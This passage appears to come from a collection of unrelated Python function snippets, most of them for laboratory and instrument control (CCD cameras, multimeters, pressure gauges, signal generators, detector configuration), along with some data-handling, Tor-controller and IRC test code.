open(fileName, 'wb')\n f.write(image_data)\n f.close()\n imgName = fileName\n \n return fileName", "def getConc(fileID, spc):\r\n\r\n dataKey = rmn.fstinf(fileID, nomvar=spc, ip1=ip1)['key']\r\n dataRec = rmn.fstluk(dataKey)\r\n concData = dataRec['d']\r\n return concData, dataKey, dataRec", "def connect(self):\n self.vgc = Pfeiffer_VGC_Interface(port=self.settings.port.val, debug=self.settings['debug_mode'])\n\n self.settings.ch1_pressure.connect_to_hardware(read_func=getattr(self,'read_ch1_pressure'))\n \n self.settings.ch1_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch1_sensor_type'))\n \n self.settings.ch2_pressure.connect_to_hardware(read_func=getattr(self,'read_ch2_pressure'))\n \n self.settings.ch2_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch2_sensor_type'))\n \n self.settings.ch3_pressure.connect_to_hardware(read_func=getattr(self, 'read_ch3_pressure'))\n \n self.settings.ch3_sensor_type.connect_to_hardware(read_func=getattr(self, 'read_ch3_sensor_type'))\n \n self.settings.ch1_sensor_type.read_from_hardware()\n self.settings.ch2_sensor_type.read_from_hardware()\n self.settings.ch3_sensor_type.read_from_hardware()", "def short_circ():\n \n set_mode(mode_cv)\n time.sleep(.250)\n set_CV_volts(0.1)\n time.sleep(.250)\n \n sc_vals = get_input_values()\n sc_data_point = data_point(sc_vals)\n jsc = sc_data_point[4]\n print('Short circuit current: ', jsc)\n write_data_tofile(sc_data_point)\n\n return jsc", "def cdi(self):\n from infapy.cdi import CDI\n infapy.log.info(\"Created the cdi object to access the iics cdi apis\")\n return CDI(self._v3,self._v2,self._v2BaseURL,self._v3BaseURL,self._v3SessionID,self._v2icSessionID)", "async def _raw_cdc_data(self) -> Dict[str, Any]:\n data = await self._request(\"get\", \"map/cdc\")\n return cast(Dict[str, Any], data)", "def _read_cardiochip(self):\n cur_leadstatus = 0\n sample_count =0\n while self.connected:\n sample_count+=1\n #check for sync bytes\n readbyte = ord(self.ser.read(1))\n #print readbyte, SYNC_BYTE\n if readbyte != SYNC_BYTE:\n continue\n readbyte = ord(self.ser.read(1))\n if readbyte != SYNC_BYTE:\n continue\n\n #parse length byte\n while True:\n pLength = ord(self.ser.read(1))\n if pLength != SYNC_BYTE:\n break\n if pLength > 169:\n continue\n #print \"L: %i\" % pLength\n\n # collect payload bytes\n payload = self.ser.read(pLength)\n payload = [ord(x) for x in payload] #convert to int from string\n #print \"payload: \" + str(payload).strip('[]')\n # ones complement inverse of 8-bit payload sum\n checksum = sum(payload) & 0xFF\n checksum = ~checksum & 0xFF\n\n # catch and verify checksum byte\n chk = ord(self.ser.read(1))\n #print \"chk: \" + str(checksum)\n if chk != checksum:\n print \"checksum error, %i != %i\" % (chk, checksum)\n continue\n\n output = self._parseData(payload)\n\n lead_status = next(( d for d in output if 'leadoff' in d), None)\n if lead_status is not None:\n if cur_leadstatus != lead_status['leadoff']:\n #we have a change\n if lead_status['leadoff']==200:\n print \"LEAD ON\"\n elif lead_status['leadoff']==0:\n print \"LEAD OFF\"\n cur_leadstatus = lead_status['leadoff']\n\n # store the output data in a queue\n # first, create a tuple with the sample index and dict with the timestamp and ecg\n ecgdict = next(((i,d) for i,d in enumerate(output) if 'ecg_raw' in d), None)\n if ecgdict is not None and sample_count>self.Fs*2:\n #let's just ignore the first 2 seconds of crappy data\n ecgdict[1]['leadoff'] = cur_leadstatus\n #print ecgdict[1]\n self.ecg_buffer.put(ecgdict[1]) # this should save the ecg and timestamp keys\n\n return", "def main() :\n #fname = '/reg/d/psdm/CXI/cxi35711/hdf5/cxi35711-r0009.h5'\n #dsname = '/Configure:0000/Run:0000/CalibCycle:0000/CsPad::ElementV2/CxiDs1.0:Cspad.0/data'\n #event = 1\n\n fname = '/reg/d/psdm/CXI/cxi37411/hdf5/cxi37411-r0039.h5'\n dsname = '/Configure:0000/Run:0000/CalibCycle:0000/CsPad::ElementV2/CxiDsd.0:Cspad.0/data'\n event = 1\n\n print 'Default CSPad configuration pars:'\n cspadconfig.printCSPadConfigPars()\n\n print '\\nCSPad configuration pars: for fname, dsname, event =\\n', fname, '\\n', dsname, '\\n', event\n cspadconfig.setCSPadConfiguration( fname, dsname, event ) # This will set current CSPad configuration\n cspadconfig.printCSPadConfigPars()", "def CCDpowerup(self):\n #starting drain voltages on CABAC\n drains = {\"OD\": 29, \"GD\": 24, \"RD\": 18}\n self.send_cabac_config(drains)\n\n time.sleep(1)\n\n #starting OG voltage on CABAC\n og = {\"OG\": 3.5}\n self.send_cabac_config(og)\n\n time.sleep(1)\n\n #sets clock rails\n dacs = {\"V_SL\": 0, \"V_SH\": 8.03, \"V_RGL\": 0, \"V_RGH\": 8.03, \"V_PL\": 0, \"V_PH\": 9.13}\n self.fpga.set_clock_voltages(dacs)\n\n time.sleep(1)\n\n #sets clock currents on CABAC\n iclock = {\"IC\": 255}\n self.send_cabac_config(iclock)\n\n time.sleep(1)\n\n #puts current on CS gate\n for stripe in self.stripes:\n self.fpga.set_current_source(0xfff, stripe)\n\n #rewrite default state of sequencer (to avoid reloading functions)\n self.fpga.send_function(0, self.seq.get_function(0))\n\n time.sleep(0.1)\n\n #now is the time to the backsubstrate voltage (elsewhere)\n print(\"CCD start-up sequence complete on REB, ready for Back Substrate.\")", "def _add_control_channel(self, attrs):\n _cable_data = {}\n _cable_data[\"crate\"] = self._crate\n _cable_data[\"module\"] = self._module\n _cable_data[\"channel\"] = int(attrs.get('number', \"\"))\n _cable_data[\"name\"] = str(attrs.get('name', \"\"))\n self._data.append(_cable_data)", "def control_change(self, channel, cc, value):\n knob, bank = self.decode_mpd218_cc(cc)\n log.debug(\"Winch control change %d on knob %d bank %d\", cc, knob, bank)\n\n if knob == 1: # Knob #1 on MPD218, use to control resonant frequency\n #self.frequency = 0.05 + 0.1 * value\n self.frequency = 5.00\n self.set_freq_damping()\n\n elif knob == 2: # Knob #2 on on MPD218, use to control damping ratio\n #self.damping_ratio = 0.05 + 0.01 * value\n self.damping_ratio = 1.32\n self.set_freq_damping()", "def get_cdelt_dcflag(hd):\n cdelt = None\n if 'CDELT1' in hd:\n cdelt1 = hd['CDELT1']\n elif 'CD1_1' in hd:\n cdelt1 = hd['CD1_1'] # SDSS style\n\n dc_flag = 0\n if 'DC-FLAG' in hd:\n dc_flag = hd['DC-FLAG']\n elif cdelt1 < 1e-4:\n import warnings\n warnings.warn('WARNING: CDELT1 < 1e-4, Assuming log wavelength scale')\n dc_flag = 1\n\n return cdelt1, dc_flag", "def _get_cbase(self):\n from PSCalib.CalibParsBasePnccdV1 import CalibParsBasePnccdV1\n return CalibParsBasePnccdV1()", "def __cnc(cls, sens_mv, we_c):\n if we_c is None:\n return None\n\n cnc = we_c / (sens_mv / 1000.0)\n\n # print(\"A4Datum__cnc: we_c:%s cnc:%f\" % (we_c, cnc), file=sys.stderr)\n\n return cnc", "def _write_coft(parameters):\n # Format\n fmt = block_to_format[\"COFT\"]\n fmt = str2format(fmt[5])\n\n values = [x for x in parameters[\"connection_history\"]]\n out = write_record(values, fmt, multi=True)\n\n return out", "def connect_dmm2110():\n address = 'USB0::0x05E6::0x2110::8010814::INSTR'\n rm = visa.ResourceManager()\n return rm.open_resource(address)", "def setCSPadConfigurationFromOpenFile( self, h5file, dsname, event=0 ):\n if gm.CSpad2x2ElementIsInTheName(dsname) :\n print 'getCSpadConfiguration(...): This is a CSpad2x2Element. Special configuration is not required'\n self.isCSPad2x2 = True\n return\n\n self.h5file = h5file\n self.quadNumsInEvent = self.getQuadNumsInEvent( dsname, event )\n self.indPairsInQuads = self.getIndPairsInQuads( dsname )\n #self.printCSPadConfigPars()", "def d1out():\n\tsetState(\"D1\", \"-DI-PHDGN-01:CON\", CON_OUT)", "def read_s_and_c(self):\n speed = self._previous_speed\n cadence = self._previous_cadence\n for conn, svc in zip(self.cyc_connections, self.cyc_services):\n if not conn.connected:\n speed = cadence = 0\n continue\n values = svc.measurement_values\n if not values:\n if self._cadence_failed >= 3 or self._speed_failed >= 3:\n if self._cadence_failed > 3:\n cadence = 0\n if self._speed_failed > 3:\n speed = 0\n continue\n if not values.last_wheel_event_time:\n continue\n speed = self._compute_speed(values, speed)\n if not values.last_crank_event_time:\n continue\n cadence = self._compute_cadence(values, cadence)\n\n if speed:\n speed = str(speed)[:8]\n if cadence:\n cadence = str(cadence)[:8]\n\n return speed, cadence", "def _process_cdc(self):\n if self.load_type in [LoadType.CDC, LoadType.Full_Load_And_CDC]:\n output_location_for_cdc = os.path.join(self.output_location,\n \"cdc\")\n if not os.path.exists(self.output_location):\n os.mkdir(self.output_location)\n if not os.path.exists(output_location_for_cdc):\n os.mkdir(output_location_for_cdc)\n cdc_init_params = {\n \"output_folder_location\": output_location_for_cdc,\n \"connection_string\": self.connection_string,\n \"table_names\": self.table_names,\n }\n cdc_process = multiprocessing.Process(\n target=PostgresOperator._run_cdc_process,\n args=(self.cdc_plugin_name, cdc_init_params))\n cdc_process.name = \"siirto_cdc_\" + str(uuid.uuid4())\n cdc_process.start()\n return cdc_process\n return None", "def hsdpa_physical_downlink_settings(self):\r\r\n\r\r\n config_list = []\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"Channel( Carrier 1)\", \"Level\"))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"==================\", \"=====\"))\r\r\n\r\r\n pcpich_level = -10.2\r\r\n self.set_pcpich_code_level(carrier=1, leveldB=pcpich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CPICH\", pcpich_level))\r\r\n\r\r\n psch_level = -15.2\r\r\n ssch_level = psch_level\r\r\n pccpch_level = -12.2\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:PSCH %s' %psch_level)\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:SSCH %s' %ssch_level)\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:PCCPch %s' %pccpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-SCH\", psch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"S-SCH\", ssch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CCPCH\", pccpch_level))\r\r\n\r\r\n\r\r\n # SCCPH power level and channelisation code\r\r\n sccpch_level = -12.2\r\r\n self.set_dl_chan_code_level(dl_chan='SCCPch', code=2, level_dB=sccpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"S-CCPCH\", sccpch_level))\r\r\n\r\r\n # PICH power level and channelisation code\r\r\n pich_level = -15.2\r\r\n self.set_dl_chan_code_level(dl_chan='PICH', code=2, level_dB=pich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"PICH\", pich_level))\r\r\n\r\r\n # AICH power level and channelisation code\r\r\n aich_level = -15.2\r\r\n self.set_dl_chan_code_level(dl_chan='AICH', code=3, level_dB=aich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"AICH\", aich_level))\r\r\n\r\r\n # DPCH power and channelisation code\r\r\n dpch_level = -18.2\r\r\n self.set_dl_chan_code_level(dl_chan='DPCH', code=3, level_dB=dpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"DPCH\", dpch_level))\r\r\n\r\r\n # F-DPCH power and channelisation ocde\r\r\n fdpch_level = -18.2\r\r\n self.set_dl_chan_code_level(dl_chan='FDPCh', code=6, level_dB=fdpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"F-DPCH\", fdpch_level))\r\r\n\r\r\n # DPCH enhanced settings\r\r\n self.configure_enhanced_dl_dpch()\r\r\n\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure 2 HS-SCCH: level, channelization code, UE ID and dummy UE ID\r\r\n # *****************************************************************************\r\r\n hssch_level_1 = -20.2\r\r\n hssch_level_2 = -20.2\r\r\n self.set_hssch_level(hssch_num=1, carrier=1, leveldB=hssch_level_1)\r\r\n self.set_hssch_level(hssch_num=2, carrier=1, leveldB=hssch_level_2)\r\r\n self.set_hssch_code(hssch_num=1, carrier=1, codeNum=2)\r\r\n self.set_hssch_code(hssch_num=2, carrier=1, codeNum=7)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #1\", hssch_level_1))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #2\", hssch_level_2))\r\r\n\r\r\n self.set_default_ue_id_hssch(carrier=1)\r\r\n\r\r\n # HS-PDSCH Enhanced Settings\r\r\n self.set_hsdsch_mpo(carrier=1, control=\"AUTO\", pwrOffsetManual=\"\")\r\r\n # unscheduled frame type for HSDPA\r\r\n # possible types are 'DUMMy', 'DTX'\r\r\n self.hsdsch_unsched_frames(carrier=1, usFrameType='DUMMY')\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure HS-PDSCH: level and first channelization code number\r\r\n # *****************************************************************************\r\r\n\r\r\n hsdsch_level = -1.2\r\r\n self.set_hsdsch_level(carrier=1, leveldB = hsdsch_level)\r\r\n self.set_hsdsch_chanelisation_code(code=1, carrier=1)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-PDSCH\", hsdsch_level))\r\r\n\r\r\n\r\r\n # // *****************************************************************************\r\r\n # Set level and channelization code of E-AGCH, E-HICH and E-RGCH.\r\r\n # *****************************************************************************\r\r\n eagch_level = -20.2\r\r\n ehich_level = -20.2\r\r\n ergch_level = -20.2\r\r\n self.set_dl_chan_code_level(dl_chan='EAGCh', code=3, level_dB=eagch_level)\r\r\n self.set_dl_chan_code_level(dl_chan='EHICh', code=6, level_dB=ehich_level)\r\r\n self.set_dl_chan_code_level(dl_chan='ERGCh', code=6, level_dB=ergch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-AGCH\", eagch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-HICH\", ehich_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-RGCH\", ergch_level))\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n for line in config_list:\r\r\n print line\r\r\n\r\r\n if self.dc_hsdpa:\r\r\n\r\r\n self.hsdpa_physical_downlink_settings_carrier2()", "def open_device(self):\n\t\t# open device\n\t\t# declare ctype variables\n\t\thdwf = c_int()\n\n\t\tprint \"\\nOpening device\"\n\t\tdwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))\n\n\t\tif hdwf.value == 0:\n\t\t\tprint \"failed to open device\"\n\t\t\tquit()\n\n\t\tself.interface_handler = hdwf\n\n\t\thzSysIn = c_double()\n\t\t#max_buffer_size_in = c_int()\n\n\t\tdwf.FDwfDigitalInInternalClockInfo(self.interface_handler, byref(hzSysIn))\n\t\t#dwf.FDwfDigitalInBufferSizeInfo(self.interface_handler, byref(max_buffer_size_in))\n\n\t\tself.internal_clock_freq = hzSysIn.value\n\n\t\t#print \"internal digital in frequency is \" + str(hzSysIn.value)\n\t\t#print \"digital in max buffer size: \" + str(max_buffer_size_in.value)", "def d1in():\n\tsetState(\"D1\", \"-DI-PHDGN-01:CON\", CON_IN)", "def circ_status_event(self, c):\r\n output = [c.event_name, str(c.circ_id), c.status]\r\n if c.path: output.append(\",\".join(c.path))\r\n if c.reason: output.append(\"REASON=\" + c.reason)\r\n if c.remote_reason: output.append(\"REMOTE_REASON=\" + c.remote_reason)\r\n plog(\"DEBUG\", \" \".join(output))\r\n \r\n # Circuits we don't control get built by Tor\r\n if c.circ_id not in self.circuits:\r\n plog(\"DEBUG\", \"Ignoring circuit \" + str(c.circ_id) + \r\n \" (controlled by Tor)\")\r\n return\r\n \r\n # EXTENDED\r\n if c.status == \"EXTENDED\":\r\n # Compute elapsed time\r\n extend_time = c.arrived_at-self.circuits[c.circ_id].last_extended_at\r\n self.circuits[c.circ_id].extend_times.append(extend_time)\r\n plog(\"INFO\", \"Circuit \" + str(c.circ_id) + \" extended in \" + \r\n str(extend_time) + \" sec\")\r\n self.circuits[c.circ_id].last_extended_at = c.arrived_at\r\n \r\n # FAILED & CLOSED\r\n elif c.status == \"FAILED\" or c.status == \"CLOSED\":\r\n PathBuilder.circ_status_event(self, c)\r\n # Check if there are enough circs\r\n self.check_circuit_pool()\r\n return\r\n # BUILT\r\n elif c.status == \"BUILT\":\r\n PathBuilder.circ_status_event(self, c)\r\n # Compute duration by summing up extend_times\r\n circ = self.circuits[c.circ_id]\r\n duration = reduce(lambda x, y: x+y, circ.extend_times, 0.0)\r\n plog(\"INFO\", \"Circuit \" + str(c.circ_id) + \" needed \" + \r\n str(duration) + \" seconds to be built\")\r\n # Save the duration to the circuit for later use\r\n circ.setup_duration = duration\r\n \r\n # OTHER?\r\n else:\r\n # If this was e.g. a LAUNCHED\r\n pass", "def circuit(self):\n return jet.Circuit(num_wires=4, dim=2)", "def hsdpa_physical_downlink_settings_carrier2(self):\r\r\n carrier = 2\r\r\n\r\r\n config_list = []\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"Channel( Carrier 2)\", \"Level\"))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"==================\", \"=====\"))\r\r\n\r\r\n pcpich_level = -11\r\r\n self.set_pcpich_code_level(carrier=carrier, leveldB=pcpich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CPICH\", pcpich_level))\r\r\n\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure 2 HS-SCCH: level, channelization code, UE ID and dummy UE ID\r\r\n # *****************************************************************************\r\r\n hssch_level_1 = -18.0\r\r\n hssch_level_2 = -18.0\r\r\n self.set_hssch_level(hssch_num=1, carrier=carrier, leveldB=hssch_level_1)\r\r\n self.set_hssch_level(hssch_num=2, carrier=carrier, leveldB=hssch_level_2)\r\r\n self.set_hssch_code(hssch_num=1, carrier=carrier, codeNum=2)\r\r\n self.set_hssch_code(hssch_num=2, carrier=carrier, codeNum=7)\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #1\", hssch_level_1))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #2\", hssch_level_2))\r\r\n\r\r\n self.set_default_ue_id_hssch(carrier=carrier)\r\r\n\r\r\n # HS-PDSCH Enhanced Settings\r\r\n self.set_hsdsch_mpo(carrier=carrier, control=\"AUTO\", pwrOffsetManual=\"\")\r\r\n self.hsdsch_unsched_frames(carrier=carrier, usFrameType='DUMMY')\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure HS-PDSCH: level and first channelization code number\r\r\n # *****************************************************************************\r\r\n hsdsch_level = -1.6\r\r\n self.set_hsdsch_level(carrier=carrier, leveldB = hsdsch_level)\r\r\n self.set_hsdsch_chanelisation_code(carrier=carrier, code=1)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-PDSCH\", hsdsch_level))\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n for line in config_list:\r\r\n print line", "def csc():\n endcaps = [1,2]\n disks = [1,2,3,4]\n rings = {1:[1,2,3], # different rings for different disks\n 2:[1,2], \n 3:[1,2],\n 4:[1,2]}\n\n csc_info = {\n \"endcaps\":endcaps,\n \"disks\": disks,\n \"rings\": rings}\n\n return csc_info", "def have_cdc() -> bool:", "def ocpc(self):\n return self._ocpc", "def setParams(commandList):\n\n for i in commandList:\n # set the bin mode (1x1 or 2x2)\n if 'bin=' in i:\n try:\n bin = int(i.replace('bin=',''))\n if bin >= 1 and bin <= 2:\n ccd_bin[0].value = bin\n ccd_bin[1].value = bin\n indiclient.sendNewNumber(ccd_bin)\n response = 'OK: Bin mode set to '+str(bin)+'x'+str(bin)\n else:\n response = 'BAD: Invalid Bin Mode'\n except ValueError:\n response = 'BAD: Invalid Bin Mode'\n\n # turn the cooler on/off\n elif 'cooler=' in i:\n cooler = i.replace('cooler=','')\n\n if cooler.lower() == 'on':\n ccd_cooler[0].s=PyIndi.ISS_ON # the \"COOLER_ON\" switch\n ccd_cooler[1].s=PyIndi.ISS_OFF # the \"COOLER_OFF\" switch\n indiclient.sendNewSwitch(ccd_cooler)\n response = 'OK: Cooler turned '+cooler\n elif cooler.lower() == 'off':\n ccd_cooler[0].s=PyIndi.ISS_OFF # the \"COOLER_ON\" switch\n ccd_cooler[1].s=PyIndi.ISS_ON # the \"COOLER_OFF\" switch\n indiclient.sendNewSwitch(ccd_cooler)\n response = 'OK: Cooler turned '+cooler\n else:\n response = 'BAD: Invalid cooler set'\n \n # set the temperature setpoint (-40C - 0C)\n elif 'temp=' in i:\n try:\n temp = float(i.replace('temp=',''))\n if temp >= -40 and temp <= 0:\n response = 'OK: Setting temperature setpoint to '+str(temp)\n ccd_temp[0].value = temp\n indiclient.sendNewNumber(ccd_temp)\n else:\n response = 'BAD: Invalid temperature setpoint'\n except ValueError:\n response = 'BAD: Invalid temperature setpoint'\n \n # set the image output directory\n elif 'fileDir=' in i:\n try:\n global imgNum\n global imgName\n global fileDir\n tempFileDir = i.replace('fileDir=','')\n\n if tempFileDir[0] == '~':\n tempFileDir = os.path.expanduser('~')+tempFileDir[1:]\n \n if tempFileDir[len(tempFileDir)-1] != '/':\n tempFileDir = tempFileDir+'/'\n\n if not os.path.exists(tempFileDir):\n os.makedirs(tempFileDir)\n \n imgNum, imgName = last_image(tempFileDir)\n fileDir = tempFileDir\n response = 'OK: File directory set to '+fileDir\n #run_image_display(fileDir)\n\n except FileNotFoundError:\n response = 'BAD: Directory does not exist'\n\n # set the temperature setpoint (-40C - 0C)\n elif 'frameType=' in i:\n try:\n frameType = i.replace('frameType=','')\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n else:\n response = 'BAD: Invalid frame type'\n except ValueError:\n response = 'BAD: Invalid frame type'\n\n else:\n response = 'BAD: Invalid Set'+'\\n'+response\n\n return response", "def connect_dmm2100():\n address = 'USB0::0x05E6::0x2100::1416380::INSTR'\n rm = visa.ResourceManager()\n return rm.open_resource(address)", "def get_cdc_data (connection, primary_tablename, primary_val_name,\n join_tablenames=[],\n join_ons=[],\n join_val_names=[]):\n\n # build query\n sql_query = 'SELECT {0}.*'.format (primary_tablename)\n for t, name in izip (join_tablenames, join_val_names):\n sql_query += ', {0}.\"Value\" AS {1}'.format (t, name)\n sql_query += ' FROM {0}'.format (primary_tablename)\n for t, join in izip (join_tablenames, join_ons):\n sql_query += ' LEFT JOIN {0} ON {1}.{2}={0}.{3}'.format (\n t, primary_tablename, join[0], join[1])\n sql_query += ';'\n # print (sql_query)\n data = pd.read_sql_query(sql_query, con, index_col='index')\n\n # Standardize FIPS label\n data = data.rename (columns={\n 'cnty_fips': 'FIPS', 'Value': primary_val_name\n })\n data['FIPS'] = data['FIPS'].apply (lambda x: str(x).zfill (5))\n\n # Make -1's nan's (CDC data not available values)\n data.where (data != -1, other=np.nan, inplace=True)\n return (data)", "def GetChannelDescription(vDataSet,aIndexC):\r\n\r\n s = \"\"\r\n if aIndexC >= 0 and aIndexC < vDataSet.GetSizeC():\r\n s = vDataSet.GetChannelDescription(aIndexC)\r\n\r\n return s", "def ccdtemp(n=2):\n temp = camera.GetTemperature()\n camera.status.update()\n mesg, f1, f2, f3, f4 = camera.GetTemperatureStatus()\n print \"Sensor Temp=%6.1f, TargetTemp=%6.1f, AmbientTemp=%6.1f, CoolerVolts=%6.2f\" % (f1,f2,f3,f4)\n return temp", "def computeConeActivity(Analysis, ImageData, rec_field, cpd, _meta,\n _brownian=True, glasses=False):\n Rec_Field = (rec_field[540]['fft'] / rec_field['max']) \n \n ImageData['fitLaw'] = ImageData['powerlaw'](cpd[1:])\n powerlaw = ImageData['fitLaw']\n\n if _brownian: \n temp = np.arange(1, 80)\n movement_filter = brownian_motion(cpd[1:], temp)\n powerlaw *= movement_filter\n\n # compute the diffraction limited case seperately\n diffract = {}\n diff, _x = o.diffraction(_meta['samples'], \n _meta['pupil_size'],\n 16.6, \n ref_index=1.4, \n wavelength=550.0)\n # now interpolate mtf into cpd's of analysis:\n mtf = np.interp(cpd, _x, diff)\n\n # remove zeros to avoid errors in future computations:\n ind = np.where(mtf != 0)[0]\n diffract['cpd'] = cpd[ind]\n diffract['mtf'] = mtf[ind]\n\n diffract['preCone'] = (powerlaw[ind] * \n diffract['mtf'][ind])\n diffract['retina'] = (diffract['preCone'] *\n Rec_Field[ind])\n\n if glasses:\n # if glasses on, compute effect after diffraction case\n powerlaw *= gauss(cpd[1:], 10)\n\n for key in Analysis:\n # find cone fft:\n wv = Analysis[key]['wavelength']\n Rec_Field = (rec_field[wv]['fft'] / rec_field['max'])\n\n # generate MTFs for each condition:\n intensity = traceEye(\n Analysis[key]['dist'], \n Analysis[key]['off_axis'], \n Analysis[key]['pupil_size'], \n Analysis[key]['focus'],\n Analysis[key]['wavelength'])\n psf = o.genPSF(intensity, _meta['samples'])[1]\n Analysis[key]['mtf'] = o.genMTF(psf)[ind]\n\n Analysis[key]['preCone'] = (powerlaw[ind] * \n Analysis[key]['mtf'])\n\n Analysis[key]['retina'] = (Analysis[key]['preCone'] *\n Rec_Field[ind])\n\n return Analysis, diffract", "def do_c(self, line):\n return ODBCUtility.do_c(self, line)", "def circuitSat(C):", "def __init__(self, config_file='DAC.yaml', variables={}):\n\n self.channels = {}\n self._n_channels = 0\n self._n_markers = 0\n\n # Timing information\n self._sample_rate = 1e9\n self._seq_length = 0\n\n # waveform SD objects\n self._wave_sds = []\n\n # Instantiate and connect cards\n # get cards and sort by chassis and slot\n self.cards = []\n self.cards = [x for x in get_cards() if x.type == 'DAC']\n self.cards = sorted(self.cards, key=lambda x: x.chassis)\n self.cards = sorted(self.cards, key=lambda x: x.slot)\n\n # connect to cards\n self._connect()\n\n super().__init__(config_file, variables)\n\n qtrl._DAC = self", "def test_ctcpQuery_DCC(self):\n self.client.ctcpQuery_DCC(self.user, self.channel, \"data\")\n self.assertEqual(\n self.client.methods,\n [\n (\n \"ctcpMakeReply\",\n (\"Wolf\", [(\"ERRMSG\", \"DCC data :Unknown DCC type 'DATA'\")]),\n )\n ],\n )", "def con(self, bsfile, sn=None):\n\n self.usb = NAE.NAEUSB()\n self.usb.con(idProduct=[0xACE5], serial_number=sn)\n self._llint = LLINT.PhyWhispererUSB(self.usb)\n\n with open(bsfile,\"rb\") as bitstream:\n self._llint.FPGAProgram(bitstream) \n\n # for cw.target()\n self.usart = USART(self.usb)\n self._cwusb = self.usb", "def start_calibration(self):\n self.socket.send_string('C')\n return self.socket.recv_string()", "def performOpen(self, options={}):\n \n self.establish_connection() \n self.setModel(self.model_number)\n\n self.log(self.model_number, level = 30)\n \n self.switch_id_lsb_map = {'A': 0, 'B': 1, 'C': 2, 'D': 3,\n 'E': 4, 'F': 5, 'G': 6, 'H': 7}\n #except Exception as e:\n #msg = str(e)\n #raise InstrumentDriver.CommunicationError(msg)", "def C(width = 1, size = (10, 20), layer = 0):\n D = Device(name = 'C')\n w = width/2\n s1, s2 = size\n points = [(-w, -w), (s1, -w), (s1, w), (w, w), (w, s2-w),\n (s1, s2-w), (s1, s2+w), (-w, s2+w), (-w, -w)]\n D.add_polygon(points, layer = layer)\n D.add_port(name = 1, midpoint = (s1, s2), width = width, orientation = 0)\n D.add_port(name = 2, midpoint = (s1, 0), width = width, orientation = 0)\n return D", "def openCif(self, filename):\r\n cf = CifFile.ReadCif(filename)\r\n \r\n #Assuming all data is in one outer block like NIST examples:\r\n data = cf[cf.keys()[0]]\r\n \r\n #Create a Crystollographic Unit Cell\r\n a = data['_cell_length_a']\r\n b = data['_cell_length_b']\r\n c = data['_cell_length_c']\r\n \r\n alpha = data['_cell_angle_alpha']\r\n gamma = data['_cell_angle_gamma']\r\n beta = data['_cell_angle_beta']\r\n \r\n spaceGroupInt = int(data['_symmetry_Int_Tables_number'])\r\n spaceGroup = SpaceGroups.GetSpaceGroup(spaceGroupInt)\r\n \r\n unitcell = Cell(spaceGroup, 0,0,0, a, b, c, alpha, gamma, beta)\r\n \r\n atomLabels = data['_atom_site_label']\r\n atomSymbol = data['_atom_site_type_symbol']\r\n xPositions = data['_atom_site_fract_x']\r\n yPositions = data['_atom_site_fract_y']\r\n zPositions = data['_atom_site_fract_z']\r\n \r\n atoms = [] #for the cell window\r\n for i in range(len(atomLabels)):\r\n #unitcell.generateAtoms((float(xPositions[i]), float(yPositions[i]), float(zPositions[i])), atomLabels[i])\n\r\n aData = [atomLabels[i], 0, float(xPositions[i]), float(yPositions[i]), float(zPositions[i])]\r\n #--Added to atomData: single ion anisotropy, spin magnitude, valence\r\n aData.append(0.0)#Dx\r\n aData.append(0.0)#Dy\r\n aData.append(0.0)#Dz\r\n 